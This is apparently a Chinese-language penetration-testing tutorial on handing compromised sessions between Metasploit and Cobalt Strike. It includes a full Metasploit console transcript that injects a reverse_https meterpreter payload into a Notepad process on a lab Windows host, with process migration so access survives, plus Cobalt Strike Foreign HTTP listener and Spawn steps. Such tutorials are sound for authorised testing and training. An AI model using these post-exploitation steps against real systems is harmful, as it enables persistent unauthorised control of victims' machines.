一、前言 Cobalt Strike 和 Metasploit 是渗透测试经常会用到的两个工具,Cobalt Strike 与 Metasploit在很多地方都是兼容的,所以我们便可以将 Metasploit 攻击产生的会话传递到 Cobalt Strike 上,同样的 Cobalt Strike 的会话也能够传递到 Metasploit上。
二、Metasploit会话转到Cobaltstrike 【安全工具|Cobalt Strike与Metasploit会话互转】1、首先通过Metasploit获取会话。
文章图片
2、开启 Cobalt Strike ,设置监听。
文章图片
3、会话互转,使用windows/local/payload_inject
模块。
文章图片
详情如下。
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > sessions -lActive sessions
===============IdNameTypeInformationConnection
-------------------------------
1meterpreter x86/windowsSTU1\Administrator @ STU1192.168.60.65:4444 -> 192.168.60.84:2425 (192.168.60.84)msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf6 exploit(windows/local/payload_inject) > set lport 443
lport => 443
msf6 exploit(windows/local/payload_inject) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf6 exploit(windows/local/payload_inject) > set PrependMigrate true
PrependMigrate => true
msf6 exploit(windows/local/payload_inject) > set session 1
session => 1
msf6 exploit(windows/local/payload_inject) > run[*] Running module against STU1
[*] Spawned Notepad process 3504
[*] Injecting payload into 3504
[*] Preparing 'windows/meterpreter/reverse_https' for PID 3504
msf6 exploit(windows/local/payload_inject) >
(1)
windows/local/payload_inject
使用该模块可以将 Metasploit 获取到的会话注入到CS中。(2)
set DisablePayloadHandler true
用来禁用 Metasploit payload handler的监听,目的就是告诉 Metasploit,我们已经建立了监听器,不必再新建监听器了,避免在 Metasploit 内再起一个 handler 来服务你的 payload 连接。(3)
set PrependMigrate true
用来启用迁移进程,这个操作可以前置MSF shellcode 在另一个进程中运行,如果被利用的应用程序崩溃或被用户关闭,MSF中的会话断开,但转到CS的 Beacon 会话仍然是存活的,该选项可选。4、如下,当在MSF中执行完如上操作之后,可能需要等待一会,就可以看到Cobalt Strike 接收到传递过来的会话了。
文章图片
三、Cobaltstrike会话转到Metasploit 1、首先获取一个Cobalt Strike会话。
文章图片
2、开启Metasploit,设置监听。
文章图片
3、开始会话互转
(1)在 Cobalt Strike 上先创建一个 Foreign HTTP 监听,IP和端口设置成上面 Metasploit 所设置 handler 模块的端口和 IP。
文章图片
(2)选择要传递的会话,点击右键,选择 Spawn(增加会话),然后再选择刚才建立的监听器。
文章图片
4、等待一会,就可以看到 Cobalt Strike 传递过来的会话了(可能等待时间较长)
文章图片
推荐阅读
- 安全工具|cobalt strike 的基础使用
- 安全工具|ubuntu安装CobaltStrike,MSF,john
- 网络安全|网络安全——基于联合查询的字符型GET注入
- 网络安全|网络安全——钓鱼邮件和网站克隆
- 计算机网络|网络安全基础
- 网络|node-red、nodejs与JavaScript之间的区别与联系
- 渗透测试|渗透测试-Web常见漏洞描述及修复建议
- big|2022-2028年中国休闲食品行业市场调查研究及发展前景规划报告
- 网络安全|【网络安全】XSS跨站脚本攻击专题讲解